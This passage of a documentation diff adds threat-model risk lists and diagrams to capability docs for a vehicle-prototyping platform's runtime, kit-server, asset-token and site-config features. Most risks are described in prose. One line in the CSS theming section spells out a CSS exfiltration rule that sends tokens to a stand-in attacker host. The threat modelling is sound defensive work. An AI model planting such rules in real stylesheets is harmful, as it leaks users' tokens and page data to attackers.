+- **Workspace escape via runtime:** the connected kit server executes arbitrary prototype code (Python/Rust); a compromised or rogue kit could reach back into browser context or shared storage and escape the prototype workspace.
+- **Remote compile code exfiltration:** Rust remote compile ships source to an external compiler — a hostile or misconfigured compiler endpoint receives the user's prototype IP.
+- **Token theft over Socket.IO:** the direct Socket.IO channel carries the asset token; an XSS in the panel or a tampered custom runtime URL (localStorage) could leak it.
+
+### Data protection
+
+Runtime signal values are transient (`runtimeStore`); prototype code sent to the kit/remote compiler for execution.
+
+**Risks:**
+- **Prototype code exposure:** code is sent to the kit server / remote compiler for execution — a compromised runtime retains and exfiltrates prototype IP.
+- **Signal-value leak:** transient signal/var values flowing into `runtimeStore` could be captured by a malicious widget iframe notified on run/stop.
 
 ## Runtime / asset manager
 
-- **Description:** Dialog to create/list/share/edit/delete cloud-runtime and hardware-kit assets; select the active runtime.
-- **Who uses it / value:** End users (manage their runtimes/kits); collaborators (shared access).
-- **Acceptance criteria:**
-  - Create/share/edit/delete assets; selecting an active runtime drives the control panel.
-  - Auth required.
-- **Quality control:** Create a cloud runtime asset → selectable in the control panel; share it → collaborator can select; delete → gone.
-- **Security:** Auth required; sharing via `WRITE_ASSET` (see [assets-sharing.md](./assets-sharing.md)).
-- **Data protection:** Asset `data` (e.g. endpoint config) stored in `assets`.
+### Description
+
+Dialog to create/list/share/edit/delete cloud-runtime and hardware-kit assets; select the active runtime.
+
+### Who uses it / value
+
+End users (manage their runtimes/kits); collaborators (shared access).
+
+### Acceptance criteria
+
+- Create/share/edit/delete assets; selecting an active runtime drives the control panel.
+- Auth required.
+
+### Quality control
+
+Create a cloud runtime asset → selectable in the control panel; share it → collaborator can select; delete → gone.
+
+### Security
+
+Auth required; sharing via `WRITE_ASSET` (see [assets-sharing.md](./assets-sharing.md)).
+
+**Risks:**
+- **Kit endpoint tampering:** any user with edit access can repoint an asset's endpoint to an attacker-controlled kit server, redirecting all runs (and tokens) to it.
+- **Shared-runtime hijack:** a shared runtime's `WRITE_ASSET` grant lets collaborators reconfigure the kit; a mis-grant widens the attacker set who can tamper with the active runtime.
+
+### Data protection
+
+Asset `data` (e.g. endpoint config) stored in `assets`.
+
+**Risks:**
+- **Endpoint credential exposure:** asset `data` may embed kit endpoint URLs and connection config; a leaked or over-shared asset exposes the path and parameters to reach a hardware kit.
 
 ## Hardware kit manager
 
-- **Description:** Configure a hardware-kit asset's identity/connection.
-- **Who uses it / value:** Hardware-kit operators.
-- **Acceptance criteria:**
-  - Launched from My Assets for `HARDWARE_KIT` assets; auth required; configures the kit identity used by the connector.
-- **Quality control:** Configure a kit → the connector can target it; signals/VSS ops (`fetchSignalMapping`, `replaceSignalMapping`, `fetchVss`, `replaceVss`) work against the kit.
-- **Security:** Auth required; kit operations open their own Socket.IO to the kit server.
-- **Data protection:** Kit connection config in the asset `data`; signal/VSS files read/written on the kit.
+### Description
+
+Configure a hardware-kit asset's identity/connection.
+
+### Who uses it / value
+
+Hardware-kit operators.
+
+### Acceptance criteria
+
+- Launched from My Assets for `HARDWARE_KIT` assets; auth required; configures the kit identity used by the connector.
+- signals/VSS ops (`fetchSignalMapping`, `replaceSignalMapping`, `fetchVss`, `replaceVss`) work against the kit.
+
+### Quality control
+
+Configure a kit → the connector can target it; signals/VSS ops (`fetchSignalMapping`, `replaceSignalMapping`, `fetchVss`, `replaceVss`) work against the kit.
+
+```mermaid
+flowchart LR
+    O([Operator]) -->|configure identity| A["HARDWARE_KIT asset.data"]
+    A -->|targeted by| C["Runtime connector"]
+    C -->|Socket.IO| K["Kit server"]
+    K -->|fetchSignalMapping / replaceSignalMapping| SM["signal mapping"]
+    K -->|fetchVss / replaceVss| VSS["VSS files"]
+```
+
+### Security
+
+Auth required; kit operations open their own Socket.IO to the kit server.
+
+**Risks:**
+- **Hardware kit tampering:** `replaceSignalMapping`/`replaceVss` mutate the kit's signal/VSS files; a stolen asset token or broken auth check lets an attacker rewrite the kit's mapping and corrupt vehicle data.
+- **Direct kit channel abuse:** the manager's own Socket.IO to the kit server bypasses backend mediation, so a compromised kit identity can issue arbitrary kit commands unchecked.
+
+### Data protection
+
+Kit connection config in the asset `data`; signal/VSS files read/written on the kit.
+
+**Risks:**
+- **Kit data destruction:** `replaceSignalMapping`/`replaceVss` overwrite on-kit files — a malicious or mistaken replace permanently destroys the prior mapping/VSS with no backend-side recovery.
+- **Connection-config leak:** kit identity/connection config stored in asset `data` is a persistent credential; an over-shared or leaked asset hands operators-of-the-kit access to attackers.
 
 ## Asset access tokens
 
-- **Description:** Issues a JWT bound to an Asset (no refresh token) so external/runtime clients authenticate as the asset for kit-server/runtime access.
-- **Who uses it / value:** DevOps/integrators (programmatic runtime access); the kit server (authenticating requests).
-- **Acceptance criteria:**
-  - `POST /v2/assets/:id/generate-token` (auth + `READ_ASSET`) → `200 { tokens: { access } }` (asset-scoped, no refresh).
-  - The token is accepted by the kit server/runtime as the asset's identity.
-- **Quality control:** Generate a token → use it against the kit server → authenticated as the asset; without it → unauthorized.
-- **Security:** Requires auth + `READ_ASSET` on the asset. Asset tokens are access-only (short-lived), no refresh — reduces exposure if leaked.
-- **Data protection:** Token is a bearer credential — treat as a secret; no persistence client-side beyond memory.
+### Description
+
+Issues a JWT bound to an Asset (no refresh token) so external/runtime clients authenticate as the asset for kit-server/runtime access.
+
+### Who uses it / value
+
+DevOps/integrators (programmatic runtime access); the kit server (authenticating requests).
+
+### Acceptance criteria
+
+- `POST /v2/assets/:id/generate-token` (auth + `READ_ASSET`) → `200 { tokens: { access } }` (asset-scoped, no refresh).
+- The token is accepted by the kit server/runtime as the asset's identity.
+
+### Quality control
+
+Generate a token → use it against the kit server → authenticated as the asset; without it → unauthorized.
+
+```mermaid
+sequenceDiagram
+    participant U as DevOps/Integrator
+    participant API as /v2/assets/:id/generate-token
+    participant K as Kit server
+    U->>API: POST (auth + READ_ASSET)
+    API->>API: issue asset-scoped JWT (no refresh)
+    API-->>U: 200 { tokens: { access } }
+    U->>K: request with bearer token
+    K-->>U: authenticated as the asset
+```
+
+### Security
+
+Requires auth + `READ_ASSET` on the asset. Asset tokens are access-only (short-lived), no refresh — reduces exposure if leaked.
+
+**Risks:**
+- **Bearer credential theft:** the token is a bearer credential; any leak (logs, localStorage, referrer) lets the holder act as the asset against the kit server for the token's lifetime.
+- **Scope over-grant:** if `READ_ASSET` is granted too broadly, users who can read an asset can mint tokens that authenticate as it — escalating readers to runtime actors.
+
+### Data protection
+
+Token is a bearer credential — treat as a secret; no persistence client-side beyond memory.
+
+**Risks:**
+- **Persistent token leakage:** a token persisted anywhere beyond memory (devtools, network logs, shared dashboards) survives until expiry and enables silent kit access as the asset.
 
 ## Kit server proxy
 
-- **Description:** Reverse-proxies `/kit-server/*` to the configured `KIT_SERVER_URL` (websocket-aware, path-rewrite).
-- **Who uses it / value:** The frontend runtime connector (a same-origin entry point to the kit server); DevOps (centralize kit access).
-- **Acceptance criteria:**
-  - `ALL /kit-server/*` proxied to `KIT_SERVER_URL`; websockets upgraded.
-  - Conditional on `KIT_SERVER_URL` being configured.
-- **Quality control:** With `KIT_SERVER_URL` set, runtime connections via `/kit-server` succeed; without it, the route is inactive.
-- **Security:** Passthrough — the kit server enforces its own auth (often via asset tokens). CSP/connect-src must allow the kit server.
-- **Data protection:** Proxies runtime traffic; no storage on the backend.
+### Description
+
+Reverse-proxies `/kit-server/*` to the configured `KIT_SERVER_URL` (websocket-aware, path-rewrite).
+
+### Who uses it / value
+
+The frontend runtime connector (a same-origin entry point to the kit server); DevOps (centralize kit access).
+
+### Acceptance criteria
+
+- `ALL /kit-server/*` proxied to `KIT_SERVER_URL`; websockets upgraded.
+- Conditional on `KIT_SERVER_URL` being configured.
+
+### Quality control
+
+With `KIT_SERVER_URL` set, runtime connections via `/kit-server` succeed; without it, the route is inactive.
+
+### Security
+
+Passthrough — the kit server enforces its own auth (often via asset tokens). CSP/connect-src must allow the kit server.
+
+**Risks:**
+- **SSRF via misconfigured `KIT_SERVER_URL`:** an admin misconfiguration (or compromise of the admin setting) could point `/kit-server/*` at an internal host, turning the backend into an SSRF proxy reachable from any browser.
+- **Auth-bypass perception:** because the proxy is a passthrough, a frontend that assumes same-origin = trusted could skip token checks and reach the kit server unauthenticated.
+
+### Data protection
+
+Proxies runtime traffic; no storage on the backend.
+
+**Risks:**
+- **Traffic interception:** the proxy relays runtime traffic (including tokens and prototype code) in transit; a misconfigured `KIT_SERVER_URL` to an attacker host silently exfiltrates both.
 
 ## Runtime server config
 
-- **Description:** Site-config `RUNTIME_SERVER_URL` + `RUNTIME_SERVER_CONFIG` (Socket.IO client options) drive frontend runtime connections; health-checked by the health endpoint.
-- **Who uses it / value:** Admins/DevOps (point instances at a kit server).
-- **Acceptance criteria:**
-  - Site-config public read; admin write. Health endpoint reports runtime-server reachability.
-- **Quality control:** Change `RUNTIME_SERVER_URL` → runtime connections use the new server; health check reflects status.
-- **Security:** Public read (URL only, no secrets); admin write.
-- **Data protection:** URL + Socket.IO options only; `RUNTIME_SERVER_CONFIG` should not hold secrets.
+### Description
+
+Site-config `RUNTIME_SERVER_URL` + `RUNTIME_SERVER_CONFIG` (Socket.IO client options) drive frontend runtime connections; health-checked by the health endpoint.
+
+### Who uses it / value
+
+Admins/DevOps (point instances at a kit server).
+
+### Acceptance criteria
+
+- Site-config public read; admin write. Health endpoint reports runtime-server reachability.
+
+### Quality control
+
+Change `RUNTIME_SERVER_URL` → runtime connections use the new server; health check reflects status.
+
+### Security
+
+Public read (URL only, no secrets); admin write.
+
+**Risks:**
+- **Public URL tampering signal:** the public-read URL reveals the runtime server's origin to anonymous users, enabling targeted attacks against the kit server.
+- **Admin-only write bypass:** a missing admin check on the config write would let any user repoint all clients' runtime traffic to a hostile server.
+
+### Data protection
+
+URL + Socket.IO options only; `RUNTIME_SERVER_CONFIG` should not hold secrets.
+
+**Risks:**
+- **Secret leakage into config:** if `RUNTIME_SERVER_CONFIG` is mistakenly used to hold credentials (despite the guidance), the public-read site config would expose them to anonymous users.

--- a/docs/capabilities/site-config-theming.md
+++ b/docs/capabilities/site-config-theming.md
@@ -2,95 +2,412 @@
 
 The configuration layer driving most behavior, branding, and feature toggles. Backend: `routes/v2/system/site-management.route.js`, `services/siteConfig.service.js`, `models/siteConfig.model.js`, `config/predefinedSiteConfigs.js`. Frontend: `pages/SiteConfigManagement.tsx`.
 
+```mermaid
+flowchart TD
+    subgraph Storage
+        SC[("site_configs collection")]
+        SNAP[("SiteConfigSnapshot")]
+    end
+    subgraph Predefined
+        PDC["predefinedSiteConfigs.js<br/>(seeded $setOnInsert)"]
+        PDA["predefinedAuthConfigs.js"]
+    end
+    PDC -.->|seed on startup| SC
+    PDA -.->|auth defaults| SC
+    SC -->|public reads| PUB["Public config<br/>(non-secret)"]
+    SC -->|admin reads/writes| ADM["Admin sections<br/>(SiteConfigManagement.tsx)"]
+    SC --> CSS["/static/global.css<br/>(themed UI)"]
+    SC -->|flags| AUTH["req.authConfig<br/>(PUBLIC_VIEWING · SELF_REGISTRATION · SSO · PWD)"]
+    SC --> SSO["SSO providers / Email"]
+    SC --> HOME["CFG_HOME_CONTENT blocks"]
+    SC --> PRIV["PRIVACY_POLICY_CONTENT"]
+    ADM -->|snapshot| SNAP
+    SNAP -->|restore| SC
+```
+
 ---
 
 ## Site config CRUD
 
-- **Description:** Generic key-value store, scoped (`site`/`user`/`model`/`prototype`/`api`), with value types (string/boolean/number/array/object/image_url/color/date), a `secret` flag, categories; unique on `(key, scope, target_id)`. Predefined configs seeded on startup (`$setOnInsert`, never overwriting admin values).
-- **Who uses it / value:** Admins (configure the platform); end users (consume public config); the app (feature toggles/branding).
-- **Acceptance criteria:**
-  - Admin: `GET/POST /v2/site-config`, `GET /v2/site-config/all`, `POST /v2/site-config/by-keys`, `POST /v2/site-config/bulk-upsert`, `GET/PATCH/DELETE /v2/site-config/:id`, `/key/:key`, `/:scope/:target_id[/all]` → `200`/`201`/`204` as appropriate.
-  - Public: `GET /v2/site-config/public[/:key|/:scope/:target_id[/:key]]` returns non-secret configs; `GET /v2/site-config/sso/providers` returns enabled providers without secrets.
-- **Quality control:** Admin sets a key → public read reflects it (unless `secret`); upsert by key; bulk-upsert; seeding never overwrites an admin-set value.
-- **Security:** Public routes public; everything else requires `MANAGE_USERS`. `secret` configs are never exposed publicly.
-- **Data protection:** `secret` flag hides values from public reads; SSO provider secrets + email API keys **encrypted at rest** (`utils/encryption.js`), decrypted only for admin display.
+### Description
+
+Generic key-value store, scoped (`site`/`user`/`model`/`prototype`/`api`), with value types (string/boolean/number/array/object/image_url/color/date), a `secret` flag, categories; unique on `(key, scope, target_id)`. Predefined configs seeded on startup (`$setOnInsert`, never overwriting admin values).
+
+### Who uses it / value
+
+Admins (configure the platform); end users (consume public config); the app (feature toggles/branding).
+
+### Acceptance criteria
+
+- Admin: `GET/POST /v2/site-config`, `GET /v2/site-config/all`, `POST /v2/site-config/by-keys`, `POST /v2/site-config/bulk-upsert`, `GET/PATCH/DELETE /v2/site-config/:id`, `/key/:key`, `/:scope/:target_id[/all]` → `200`/`201`/`204` as appropriate.
+- Public: `GET /v2/site-config/public[/:key|/:scope/:target_id[/:key]]` returns non-secret configs; `GET /v2/site-config/sso/providers` returns enabled providers without secrets.
+
+### Quality control
+
+Admin sets a key → public read reflects it (unless `secret`); upsert by key; bulk-upsert; seeding never overwrites an admin-set value.
+
+```mermaid
+flowchart LR
+    A([Admin]) -->|"GET/POST /v2/site-config"| CRUD["site_configs (key,scope,target_id)"]
+    CRUD -->|secret=true| HIDE["hidden from public"]
+    CRUD -->|secret=false| PUB["GET /v2/site-config/public"]
+    SEED["predefinedSiteConfigs $setOnInsert"] -.->|never overwrites| CRUD
+```
+
+### Security
+
+Public routes public; everything else requires `MANAGE_USERS`. `secret` configs are never exposed publicly.
+
+**Risks:**
+- **Config takeover:** a missing `MANAGE_USERS` check on admin endpoints would let any user flip security-critical flags (e.g. disable `PUBLIC_VIEWING` gating or enable `SELF_REGISTRATION`) and take over the instance's auth posture.
+- **Secret leakage:** if the `secret` flag were honored only client-side or stripped from a single endpoint, secrets such as SSO `clientSecret` or email API keys could leak via a public read path.
+- **Scope/target_id spoofing:** write endpoints keyed on `(key, scope, target_id)` could let an attacker write into another tenant's/model's scope if scope authorization is not enforced server-side.
+
+### Data protection
+
+`secret` flag hides values from public reads; SSO provider secrets + email API keys **encrypted at rest** (`utils/encryption.js`), decrypted only for admin display.
+
+**Risks:**
+- **Plaintext-at-rest fallback:** if encryption were bypassed or a new secret type were added without wiring it through `utils/encryption.js`, secrets would sit in plaintext and a DB dump would expose live credentials.
+- **Admin-display interception:** secrets are decrypted for admin display, so a compromised admin session or logged response body leaks usable SSO/email credentials directly.
 
 ## Site Config management (admin)
 
-- **Description:** Admin page with 11 sections (Public, Home, Site Style, Auth, Model & Prototype, GenAI/ProtoPilot, SSO, Email, Secret, Standard Staging, Privacy), each with edit + edit history (restore/snapshot).
-- **Who uses it / value:** Admins (central configuration).
-- **Acceptance criteria:**
-  - Route `/admin/site-config` (`MANAGE_USERS`); each section edits its keys; edit history supports restore.
-- **Quality control:** Edit a config in a section → value persists + applies site-wide; restore from history → reverts.
-- **Security:** `MANAGE_USERS` for all sections.
-- **Data protection:** Edit history (snapshots) retained; secret sections mask values.
+### Description
+
+Admin page with 11 sections (Public, Home, Site Style, Auth, Model & Prototype, GenAI/ProtoPilot, SSO, Email, Secret, Standard Staging, Privacy), each with edit + edit history (restore/snapshot).
+
+### Who uses it / value
+
+Admins (central configuration).
+
+### Acceptance criteria
+
+- Route `/admin/site-config` (`MANAGE_USERS`); each section edits its keys; edit history supports restore.
+
+### Quality control
+
+Edit a config in a section → value persists + applies site-wide; restore from history → reverts.
+
+```mermaid
+flowchart TD
+    A([Admin]) -->|"/admin/site-config (MANAGE_USERS)"| SEC["11 sections"]
+    SEC --> EDIT["Edit keys"]
+    EDIT --> HIST["Edit history snapshot"]
+    HIST -->|restore| EDIT
+    EDIT -->|persist| SC[("site_configs")]
+```
+
+### Security
+
+`MANAGE_USERS` for all sections.
+
+**Risks:**
+- **Single-gate blast radius:** every section sits behind the same `MANAGE_USERS` permission, so one compromised admin (or one overly-broad grant) can rewrite auth, SSO, email, and feature flags simultaneously.
+- **History restore abuse:** if restore-from-history lacked re-authorization, an attacker who once held `MANAGE_USERS` could replay an old config (e.g. re-enabling disabled SSO) after their access was revoked.
+
+### Data protection
+
+Edit history (snapshots) retained; secret sections mask values.
+
+**Risks:**
+- **Snapshot retention of secrets:** edit history snapshots may retain prior secret values; if those snapshots aren't masked/encrypted like the live config, old credentials remain recoverable.
+- **Change history leak:** config edit history can reveal administrative actions, SSO provider changes, and email setup patterns to anyone with admin access.
 
 ## Global CSS theming
 
-- **Description:** Admin-managed stylesheet served at `/static/global.css`; get/update/restore-default.
-- **Who uses it / value:** Admins (brand the site); end users (themed UI); plugins (consume CSS variables).
-- **Acceptance criteria:**
-  - The stylesheet is served publicly at `/static/global.css` (loaded in `index.html`); the admin endpoints `GET /v2/site-config/global-css` (auth + `MANAGE_USERS`) → `200`, `PUT /v2/site-config/global-css` (auth + `MANAGE_USERS`) → `200`, and `POST /v2/site-config/global-css/restore-default` (auth + `MANAGE_USERS`) → restores the shipped default.
-- **Quality control:** Edit `:root` tokens (e.g. `--primary`) → UI re-themes live; restore-default → reverts.
-- **Security:** All three `/v2/site-config/global-css` endpoints require auth + `MANAGE_USERS`; the stylesheet itself is public at `/static/global.css`. CSS can contain selectors only (no script); instance overrides use `!important` guidance.
-- **Data protection:** Stylesheet text only; no PII.
+### Description
+
+Admin-managed stylesheet served at `/static/global.css`; get/update/restore-default.
+
+### Who uses it / value
+
+Admins (brand the site); end users (themed UI); plugins (consume CSS variables).
+
+### Acceptance criteria
+
+- The stylesheet is served publicly at `/static/global.css` (loaded in `index.html`); the admin endpoints `GET /v2/site-config/global-css` (auth + `MANAGE_USERS`) → `200`, `PUT /v2/site-config/global-css` (auth + `MANAGE_USERS`) → `200`, and `POST /v2/site-config/global-css/restore-default` (auth + `MANAGE_USERS`) → restores the shipped default.
+
+### Quality control
+
+Edit `:root` tokens (e.g. `--primary`) → UI re-themes live; restore-default → reverts.
+
+```mermaid
+sequenceDiagram
+    participant A as Admin
+    participant E as /v2/site-config/global-css
+    participant S as /static/global.css
+    participant U as End user
+    A->>E: PUT (MANAGE_USERS)
+    E-->>A: 200
+    U->>S: GET (public)
+    S-->>U: themed CSS
+    A->>E: POST /restore-default
+    E-->>A: shipped default restored
+```
+
+### Security
+
+All three `/v2/site-config/global-css` endpoints require auth + `MANAGE_USERS`; the stylesheet itself is public at `/static/global.css`. CSS can contain selectors only (no script); instance overrides use `!important` guidance.
+
+**Risks:**
+- **CSS-based exfiltration:** even without `<script>`, an attacker who can write the stylesheet can craft `background:url(attacker.com?token=...)`-style rules to exfiltrate page content and tokens, or use `@import` to pull remote stylesheets.
+- **Unauthenticated styling takeover:** if `PUT` lacked the `MANAGE_USERS` check, anyone could restyle the site (defacement) or mount phishing-by-styling (hiding warnings, recoloring buttons to lure clicks).
+- **DOM-based attacks via selectors:** hostile selectors combined with `attr()`/content tricks can extract attributes from rendered DOM and leak them via image requests.
+
+### Data protection
+
+Stylesheet text only; no PII.
+
+**Risks:**
+- **Indirect PII leak:** if CSS can target elements that render user data (e.g. names in attribute values), attribute-value exfiltration could disclose PII to an attacker-controlled endpoint.
 
 ## Home config editor
 
-- **Description:** Drag-and-drop editor for `CFG_HOME_CONTENT` blocks (hero, feature-list, button-list, news, recent, popular, partner-list, home-footer) + raw JSON/preview/history.
-- **Who uses it / value:** Admins (compose the landing page).
-- **Acceptance criteria:**
-  - Edits `CFG_HOME_CONTENT`; `PageHome` renders blocks via `homeComponentMap`; unknown block types skipped.
-- **Quality control:** Add/reorder blocks → home page reflects changes; preview shows layout; raw JSON editable.
-- **Security:** Admin only.
-- **Data protection:** Block content (titles/descriptions/image URLs); `requiredLogin` flags on action buttons.
+### Description
+
+Drag-and-drop editor for `CFG_HOME_CONTENT` blocks (hero, feature-list, button-list, news, recent, popular, partner-list, home-footer) + raw JSON/preview/history.
+
+### Who uses it / value
+
+Admins (compose the landing page).
+
+### Acceptance criteria
+
+- Edits `CFG_HOME_CONTENT`; `PageHome` renders blocks via `homeComponentMap`; unknown block types skipped.
+
+### Quality control
+
+Add/reorder blocks → home page reflects changes; preview shows layout; raw JSON editable.
+
+```mermaid
+flowchart LR
+    A([Admin]) -->|"edit CFG_HOME_CONTENT"| BLOCKS["hero · feature-list · button-list · news · recent · popular · partner-list · home-footer"]
+    BLOCKS -->|raw JSON / preview / history| HIST["History snapshot"]
+    BLOCKS -->|render via homeComponentMap| PH(["PageHome (landing)"])
+```
+
+### Security
+
+Admin only.
+
+**Risks:**
+- **Stored XSS via block content:** if block titles/descriptions/image URLs are rendered without sanitization, an admin (or a compromised admin account) could inject markup/scripts into every visitor's landing page.
+- **Malicious image URL redirect:** `image_url` fields, if not validated, could point to attacker-controlled hosts used for tracking or to serve malicious payloads.
+
+### Data protection
+
+Block content (titles/descriptions/image URLs); `requiredLogin` flags on action buttons.
+
+**Risks:**
+- **Login-flow confusion:** a `requiredLogin` flag on action buttons drives auth gating; if misconfigured or tampered with, buttons could route users to attacker-controlled auth flows (credential phishing) from the public landing page.
 
 ## Branding
 
-- **Description:** `SITE_TITLE`, `SITE_LOGO_WIDE`, `SITE_FAVICON`, `SITE_THEME_COLOR`, `SITE_DESCRIPTION`.
-- **Who uses it / value:** Admins (brand identity); end users (consistent branding).
-- **Acceptance criteria:**
-  - Consumed in `NavigationBar`/`RootLayout`/fullscreen dashboard logo.
-- **Quality control:** Set `SITE_TITLE` → nav title + browser title update; set logo → renders.
-- **Security:** Public read; admin write.
-- **Data protection:** Branding asset URLs only.
+### Description
+
+`SITE_TITLE`, `SITE_LOGO_WIDE`, `SITE_FAVICON`, `SITE_THEME_COLOR`, `SITE_DESCRIPTION`.
+
+### Who uses it / value
+
+Admins (brand identity); end users (consistent branding).
+
+### Acceptance criteria
+
+- Consumed in `NavigationBar`/`RootLayout`/fullscreen dashboard logo.
+
+### Quality control
+
+Set `SITE_TITLE` → nav title + browser title update; set logo → renders.
+
+### Security
+
+Public read; admin write.
+
+**Risks:**
+- **Brand spoofing via logo URL:** `SITE_LOGO_WIDE`/`SITE_FAVICON` are URLs; if an admin (or anyone with write access) sets them to an external host, the site loads third-party assets, enabling tracking or phishing via a swapped logo.
+- **Phishing via title/description:** a malicious `SITE_TITLE`/`SITE_DESCRIPTION` could impersonate another brand on the public site and browser tab, aiding credential phishing.
+
+### Data protection
+
+Branding asset URLs only.
+
+**Risks:**
+- **Asset-URL leakage:** branding URLs can reveal internal hosting paths or third-party providers in the public config response.
 
 ## Auth config flags
 
-- **Description:** `PUBLIC_VIEWING`, `SELF_REGISTRATION`, `SSO_AUTO_REGISTRATION`, `PASSWORD_MANAGEMENT` (all default `true`); loaded into `req.authConfig` per request; secure-fail to false on error.
-- **Who uses it / value:** Admins (control access/registration); the app (gating).
-- **Acceptance criteria:**
-  - Flags drive auth behavior across the app (see [identity-access.md](./identity-access.md)); restore defaults from `predefinedAuthConfigs.js`.
-- **Quality control:** Toggle `PUBLIC_VIEWING` off → signed-out users can't browse; `SELF_REGISTRATION` off → register `403`.
-- **Security:** Public (effective flags observable); admin to change; safe-default all-false on error.
-- **Data protection:** Boolean flags only.
+### Description
+
+`PUBLIC_VIEWING`, `SELF_REGISTRATION`, `SSO_AUTO_REGISTRATION`, `PASSWORD_MANAGEMENT` (all default `true`); loaded into `req.authConfig` per request; secure-fail to false on error.
+
+### Who uses it / value
+
+Admins (control access/registration); the app (gating).
+
+### Acceptance criteria
+
+- Flags drive auth behavior across the app (see [identity-access.md](./identity-access.md)); restore defaults from `predefinedAuthConfigs.js`.
+
+### Quality control
+
+Toggle `PUBLIC_VIEWING` off → signed-out users can't browse; `SELF_REGISTRATION` off → register `403`.
+
+```mermaid
+flowchart TD
+    REQ["Incoming request"] --> LOAD["load authConfig flags<br/>PUBLIC_VIEWING · SELF_REGISTRATION · SSO_AUTO_REGISTRATION · PASSWORD_MANAGEMENT"]
+    LOAD -->|error| FAIL["secure-fail → all false"]
+    LOAD -->|ok| REQ2["req.authConfig"]
+    REQ2 --> GATE["gate routes<br/>(403 / 401 on off)"]
+    ADM([Admin]) -.->|change| CFG[("site_configs")]
+    CFG -.-> LOAD
+```
+
+### Security
+
+Public (effective flags observable); admin to change; safe-default all-false on error.
+
+**Risks:**
+- **Flag tampering to bypass auth:** if the admin write check on these flags were weak, an attacker could flip `PUBLIC_VIEWING=true` or `SELF_REGISTRATION=true` to weaken access controls or open anonymous registration.
+- **Fail-open on load error:** the design secure-fails to all-false; if that fallback regressed to fail-open, a config-load error would silently expose the site to anonymous users.
+- **Observability leak:** effective flags are publicly observable, which can help attackers probe which auth paths are enabled (e.g. whether self-registration is open).
+
+### Data protection
+
+Boolean flags only.
+
+**Risks:**
+- **Inference of attack surface:** while flags are booleans only, exposing which gates are enabled tells an attacker exactly which registration/SSO avenues to target.
 
 ## SSO & Email configuration
 
-- **Description:** `SSO_PROVIDERS` (encrypted `clientSecret`) with public enabled-providers list; `EMAIL_CONFIG` (provider resend/smtp/none, from, apiKey, smtpConfig, encrypted secrets) + test send.
-- **Who uses it / value:** Admins/DevOps (configure SSO + email); end users (SSO buttons).
-- **Acceptance criteria:**
-  - `GET /v2/site-config/sso/providers` → enabled providers (no secrets); admin CRUD decrypts for display. `POST /v2/site-config/email/test` → sends a test email.
-- **Quality control:** Add an SSO provider → sign-in button appears; configure email (Resend/SMTP) → test send succeeds; remove provider → button hidden.
-- **Security:** Secrets encrypted at rest; never in public reads; admin-only writes.
-- **Data protection:** Secrets (clientSecret/apiKey/smtp pass) encrypted; email logs may include recipient addresses.
+### Description
+
+`SSO_PROVIDERS` (encrypted `clientSecret`) with public enabled-providers list; `EMAIL_CONFIG` (provider resend/smtp/none, from, apiKey, smtpConfig, encrypted secrets) + test send.
+
+### Who uses it / value
+
+Admins/DevOps (configure SSO + email); end users (SSO buttons).
+
+### Acceptance criteria
+
+- `GET /v2/site-config/sso/providers` → enabled providers (no secrets); admin CRUD decrypts for display. `POST /v2/site-config/email/test` → sends a test email.
+
+### Quality control
+
+Add an SSO provider → sign-in button appears; configure email (Resend/SMTP) → test send succeeds; remove provider → button hidden.
+
+```mermaid
+sequenceDiagram
+    participant A as Admin
+    participant E as /v2/site-config/sso/providers
+    participant DB as site_configs (encrypted)
+    participant U as End user
+    A->>E: POST provider (clientSecret)
+    E->>DB: encrypt at rest
+    U->>E: GET (public)
+    E-->>U: enabled providers (no secrets)
+    A->>E2: POST /v2/site-config/email/test
+    E2->>E2: send test email
+    E2-->>A: result
+```
+
+### Security
+
+Secrets encrypted at rest; never in public reads; admin-only writes.
+
+**Risks:**
+- **SSO secret theft:** a compromised admin session decrypts `clientSecret` for display; a stolen secret lets an attacker impersonate the SP and intercept SSO logins.
+- **Email API key abuse:** a leaked `EMAIL_CONFIG` apiKey/smtp credentials let an attacker send mail as the platform (phishing from a trusted domain) or exhaust the mail quota.
+- **Provider-list spoofing:** if the public providers endpoint returned config beyond the enabled flag, it could leak redirect URLs / client IDs useful for phishing.
+
+### Data protection
+
+Secrets (clientSecret/apiKey/smtp pass) encrypted; email logs may include recipient addresses.
+
+**Risks:**
+- **Recipient disclosure in logs:** test-send logs may include recipient addresses, surfacing the admin's email (and any test recipients) in audit/log stores.
+- **Persistent credential reuse:** encrypted secrets persist until rotated; a past compromise leaves stolen credentials valid until an admin manually rotates them.
 
 ## Site config snapshots & restore
 
-- **Description:** Maintains a `SiteConfigSnapshot`; admin restore merges the deploy snapshot with predefined defaults (snapshot wins per key), filtered by keys/categories/secret, reporting source (`snapshot`/`predefined`/`mixed`/`none`).
-- **Who uses it / value:** Admins/DevOps (recover config after a bad change or migration).
-- **Acceptance criteria:**
-  - `POST /v2/site-config/restore-snapshot` (admin) → `200` restored config with per-key source; auto-synced when the deploy seeder runs.
-- **Quality control:** Change a config → restore-snapshot → reverts to snapshot (where present) / predefined default.
-- **Security:** Admin only.
-- **Data protection:** Snapshots hold site-scope configs incl. encrypted secrets.
+### Description
+
+Maintains a `SiteConfigSnapshot`; admin restore merges the deploy snapshot with predefined defaults (snapshot wins per key), filtered by keys/categories/secret, reporting source (`snapshot`/`predefined`/`mixed`/`none`).
+
+### Who uses it / value
+
+Admins/DevOps (recover config after a bad change or migration).
+
+### Acceptance criteria
+
+- `POST /v2/site-config/restore-snapshot` (admin) → `200` restored config with per-key source; auto-synced when the deploy seeder runs.
+
+### Quality control
+
+Change a config → restore-snapshot → reverts to snapshot (where present) / predefined default.
+
+```mermaid
+flowchart LR
+    DEPLOY["Deploy seeder runs"] -.->|auto-sync| SNAP[("SiteConfigSnapshot")]
+    SNAP --> MERGE["restore-snapshot (admin)"]
+    PDEF["predefined defaults"] --> MERGE
+    MERGE -->|snapshot wins per key| RES["restored config<br/>source: snapshot|predefined|mixed|none"]
+    RES --> SC[("site_configs")]
+```
+
+### Security
+
+Admin only.
+
+**Risks:**
+- **Snapshot replay of weak config:** an attacker who reaches `restore-snapshot` could replay an older, less-secure snapshot (e.g. before SSO was hardened), reverting the instance to a vulnerable posture.
+- **Predefined-default downgrade:** if a key is missing from the snapshot, predefined defaults are applied; if predefined defaults ever contained a weak value historically, restore could re-introduce it.
+
+### Data protection
+
+Snapshots hold site-scope configs incl. encrypted secrets.
+
+**Risks:**
+- **Snapshot of secrets at rest:** snapshots include encrypted secrets; if encryption keys are rotated but old snapshots aren't re-encrypted, they become unreadable or, worse, decryptable with a leaked old key.
